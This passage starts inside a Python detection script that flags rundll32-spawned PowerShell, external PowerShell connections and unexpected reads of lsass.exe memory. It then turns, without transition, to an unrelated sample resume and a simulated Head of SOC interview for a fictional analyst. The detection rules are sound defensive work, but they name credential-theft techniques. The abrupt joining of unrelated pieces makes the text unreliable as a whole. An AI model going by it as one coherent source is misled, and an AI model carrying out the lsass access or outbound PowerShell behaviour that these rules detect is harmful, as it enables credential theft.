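         "detail": f'{e["DestinationIp"]}:{e["DestinationPort"]}'}
        for i, e in enumerate(events)
        if e["EventID"] == NETWORK_CONNECT
        and basename(e["Image"]) in {"powershell.exe", "pwsh.exe"}
        and is_external(e["DestinationIp"])
    ]


def flag_lsass_access(events):
    """ProcessAccess on lsass.exe requesting VM_READ from a source not on the allow-list."""
    return [
        {"rule": "lsass_access_unexpected_source", "index": i,
         "detail": f'{basename(e["SourceImage"])} GrantedAccess={e["GrantedAccess"]}'}
        for i, e in enumerate(events)
        if e["EventID"] == PROCESS_ACCESS
        and basename(e["TargetImage"]) == "lsass.exe"
        and basename(e["SourceImage"]) not in LSASS_ALLOWED_SOURCES
        and int(e["GrantedAccess"], 16) & PROCESS_VM_READ
    ]


def triage(events):
    """Run every rule; findings are returned in rule order for easy checking."""
    return (flag_rundll32_powershell(events)
            + flag_powershell_external(events)
            + flag_lsass_access(events))


if __name__ == "__main__":
    for finding in triage(CONSTRUCTED_EVENTS):
        print(f'[{finding["rule"]}] event #{finding["index"]}: {finding["detail"]}')
```

On the constructed events the three rules fire once each (events 1, 2 and 5); the csrss.exe access and the PowerShell connection to an internal host are left alone.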

CYBERSECURITY ANALYST L3 RESUME

PAUL SCHOLES
Senior Cybersecurity Analyst (L3) | SOC Operations Leader | Threat Response Strategist
Cyberjaya, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/paulscholes | GitHub: github.com/paulcyber

PROFESSIONAL SUMMARY

Senior Cybersecurity Analyst with 6+ years of SOC operations experience, including
leading incident response, mentoring junior analysts and managing high-severity client
escalations. Proven ability to design and optimise detection content, streamline triage
processes and coordinate response strategies across blue team, engineering and threat
intelligence teams. Seeking to advance into the Head of SOC role to lead people,
processes and platforms toward delivering robust cyber defence capabilities at scale.

CURRENT ROLE

Cybersecurity Analyst – Level 3 (Senior SOC / Incident Response Lead)
IzzmierCyber Defense Sdn Bhd – Kuala Lumpur, Malaysia
Aug 2021 – Present

• Lead technical response for P1 and P2 security incidents across 30+ clients
• Mentor and manage a team of 6 L1/L2 analysts, overseeing daily SOC operations
• Built detection use cases mapped to MITRE ATT&CK, including ransomware, lateral
movement and living-off-the-land attacks
• Designed response playbooks and automated alert enrichment using Cortex XSOAR
and Python
• Coordinated with Threat Intelligence, Cloud Security and Engineering teams during
major IR efforts
• Represented SOC in client review calls and post-incident briefings

Key Achievements:

• Reduced average time-to-containment from 4 hours to 1.5 hours over 12 months
• Developed a SOC metrics dashboard tracking alert volume, analyst workload and MTTR
• Promoted culture of continuous improvement with weekly knowledge-sharing and
threat briefings

PAST ROLE

Cybersecurity Analyst – Level 2 (IR & Threat Detection Focus)
IzzmierCyber Defense Sdn Bhd
Sept 2019 – Aug 2021

• Investigated malware, phishing, data exfiltration and credential theft cases
• Created and refined detection logic in Splunk and Sentinel
• Delivered technical post-incident reports and MITRE-based threat mappings
• Provided Tier-2 escalation support and worked closely with engineering for rule
tuning

EDUCATION

Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: 2018 | CGPA: 3.42

CERTIFICATIONS

• GIAC Certified Incident Handler (GCIH)
• CompTIA CySA+ – Cybersecurity Analyst
• Microsoft SC-200 – Security Operations Analyst
• Blue Team Level 2 (BTL2)
• Splunk Core Certified Power User

TECHNICAL SKILLS

SOC Leadership & Reporting

• SOC KPI/OKR development, SLA monitoring
• Shift scheduling, analyst workload balancing
• RCA, SLA deviation reporting, executive summaries

Tools & Platforms

• SIEM: Splunk, Microsoft Sentinel, Wazuh
• EDR: Cortex XDR, SentinelOne, CrowdStrike
• SOAR: Cortex XSOAR, ServiceNow IR
• Threat Intel: VirusTotal, MISP, Group-IB, MITRE ATT&CK

Automation & Scripting

• Python (log parsing, IOC enrichment)
• YAML (Sigma rules), JSON (log format handling)
• Basic KQL and SPL for detection building

LEADERSHIP PROJECTS & INITIATIVES

SOC Process Maturity Framework

• Assessed current state of SOC capability using NIST CSF & MITRE SOC-CMM
• Designed roadmap for maturity improvement with quarterly goals

L1/L2 Analyst Development Program

• Created a structured skills matrix, weekly hands-on sessions and performance
benchmarks
• Increased ticket triage accuracy and reduced L3 escalations by 45% in 6 months

Detection Engineering Governance

• Established weekly use case review meetings with TI and detection teams
• Introduced change management protocol for rule lifecycle management

Client Threat Visibility Improvement

• Deployed unified dashboards and reporting for clients using Splunk & Power BI
• Reduced client alert fatigue by tuning use cases based on true positive rates

STAKEHOLDER & TEAM ENGAGEMENT

• Spearheaded red-blue team debriefs post-simulation
• Collaborated with MSSP clients on risk posture improvements
• Represented SOC in RFPs, audits and technical due diligence
• Worked closely with compliance teams to map use cases to ISO 27001/NIST 800-61

SOFT SKILLS & SOC MANAGEMENT STRENGTHS

• Strategic thinker with operational discipline
• Skilled in incident de-escalation and crisis communication
• Excellent mentor and cross-team coordinator
• Adaptable to shifting threat landscapes and SOC models (centralised vs.
distributed)

SIMULATED INTERVIEW FOR A CANDIDATE APPLYING FOR THE POSITION OF HEAD
OF SECURITY OPERATIONS CENTRE (SOC)

SECTION 1: INTRODUCTION & VISION

Interviewer: Hi Paul, thank you for joining us today. Could you start by introducing yourself
and share why you're interested in leading our SOC here at Cybermir Defence?

Candidate (Paul): Thank you. I’m Paul Scholes, currently a Senior Cybersecurity Analyst
(L3) at IzzmierCyber Defense. With over 6 years in cybersecurity, 4 of those in SOC
operations, I’ve led incident response, built use cases, improved alert fidelity and
mentored analysts.
I’m excited by the opportunity at Cybermir Defence because of your multi-sector MSSP
footprint and your growing SOC infrastructure. I believe I can bring not only technical
guidance but also people leadership and strategic direction to scale and mature your SOC.
My vision is to build a proactive, metrics-driven and resilient SOC that operates with
confidence, structure and measurable value.

SECTION 2: CYBERSECURITY FUNDAMENTALS & LEADERSHIP PHILOSOPHY

Interviewer: What do you think are the top three challenges a SOC faces today?

Candidate:

1. Alert fatigue – Too many false positives can demotivate analysts and waste time
2. Talent retention – SOC burnout is real, especially in 24/7 environments
3. Detection quality vs visibility – Many organisations onboard tools but underutilise
them due to poor log management or detection logic

The solution lies in balancing automation, focusing on detection engineering quality and
investing in career paths and analyst development.

Interviewer: As Head of SOC, how would you describe your leadership style?

Candidate: I lead by accountability, clarity and empathy. I believe in defining clear KPIs
and responsibilities, but I also actively listen to the team. I foster a collaborative
environment, ensure they feel supported and give them space to grow. I coach analysts not
just to resolve alerts but to think like investigators and defenders.

SECTION 3: TECHNICAL & OPERATIONAL OVERSIGHT

Interviewer: What’s your experience with SIEM and detection engineering oversight?

Candidate: I’ve worked with Splunk, Sentinel and Wazuh extensively. I led a team that
deployed and maintained 60+ use cases aligned with MITRE ATT&CK. I standardised rule
creation and lifecycle governance, introduced weekly detection review sessions with our
red team and implemented performance dashboards to track true vs. false positive ratios.

Interviewer: What would your first 90 days look like as Head of SOC here?

Candidate: Day 0–30:

• Review SOC maturity using MITRE SOC-CMM or similar framework
• Evaluate current alerting structure, case management flows and SLAs
• Interview the team for pain points and feedback

Day 31–60:

• Optimise detection priorities based on threat landscape
• Improve shift handovers, containment SLAs and collaboration workflows
• Launch analyst training plans and clear escalation flowcharts

Day 61–90:

• Propose a quarterly roadmap with measurable KPIs
• Create a SOC performance scorecard and weekly review rhythm
• Engage with clients for service feedback and build trust

Interviewer: Have you led client escalations before?

Candidate: Yes. As L3, I was the lead for client escalations during major incidents. I
handled technical briefings, wrote post-incident reports and participated in lessons-
learned sessions. I believe in full transparency, owning both our success and our blind
spots.

SECTION 4: SCENARIO-BASED SITUATIONAL LEADERSHIP

Interviewer: A major client is hit by ransomware. SOC misses the early signs. You’ve been
alerted mid-stage. What do you do?

Candidate:

1. Activate incident response protocol – Inform IR lead, isolate impacted systems
immediately
2. Triage the scope – Review logs, EDR and network flow to identify blast radius
3. Contain – Block C2, revoke compromised credentials, isolate endpoints
4. Communicate – Update client with incident timeline, remediation steps and risks
5. Root Cause – Investigate detection failure, whether due to visibility, logic or alert
routing
6. Post-Mortem – Document RCA, update detection logic, run tabletop to improve
reflexes
7. Internal Check – Have a frank conversation with the SOC team and realign priorities

Interviewer: You discover one of your senior analysts failed to escalate a critical alert that
later turned into a breach. How do you handle it?

Candidate: I handle it constructively but firmly. First, I meet with the analyst privately to
understand context: was it lack of knowledge, pressure or alert fatigue?
Then, I:

• Review SOP clarity and training gaps
• Reinforce escalation thresholds and quality gates
• Use the incident as a learning moment in team retrospectives
It’s not about blame, it’s about accountability and improvement.

SECTION 5: METRICS, MATURITY, REPORTING & GOVERNANCE

Interviewer: What KPIs would you use to measure SOC performance?

Candidate:

• MTTD / MTTR
• True Positive Rate vs. False Positive Rate
• Use Case Coverage vs. Threat Landscape
• Analyst Escalation Accuracy
• Incident SLA Compliance
I’d also track analyst wellness via ticket backlog, after-hours escalations and alert
volume per person.

Interviewer: How would you report SOC value to non-technical stakeholders?

Candidate: Through visual dashboards and narratives.

• Show threat trends, volume of blocked threats and IR turnaround time
• Use a risk lens: "This month, we mitigated 2 privilege escalation attempts that could
have led to data exfiltration"
• Provide a quarterly risk summary tied to business operations (e.g., uptime,
compliance, financial exposure)

SECTION 6: TALENT MANAGEMENT & SHIFT DESIGN

Interviewer: How do you structure your SOC team and shift schedule?

Candidate: I prefer a tierless or hybrid model based on team maturity:

• Analyst Pods: Each pod handles triage + investigation, fostering ownership
• Shift Coverage: 8x3 model with 2–3 analysts per shift, 1 lead per day
• Ensure off-shift escalation protocols are clear
• Rotate roles (threat hunting, detection tuning, QA) to avoid burnout

Interviewer: How do you upskill analysts and reduce turnover?

Candidate:

• Provide a clear career roadmap: from triage to investigation to threat hunting
• Fund certs like SC-200, BTL1, CySA+
• Introduce SOC Olympics – friendly CTFs, detection races, red/blue simulations
• Recognise work publicly and celebrate wins
• Conduct regular 1-on-1s to check morale and unblock development paths

SECTION 7: QUESTIONS FROM CANDIDATE

Interviewer: Thank you, Paul. We’ve reached the end of our questions. Do you have any for
us?

Candidate: Yes, thank you:

1. How mature is Cybermir Defence’s SOC today in terms of coverage, automation
and playbook use?
2. What are the top three goals you'd want your new Head of SOC to achieve in the first
6 months?
3. Is there opportunity to collaborate across red team or CTI to improve detection
strategy?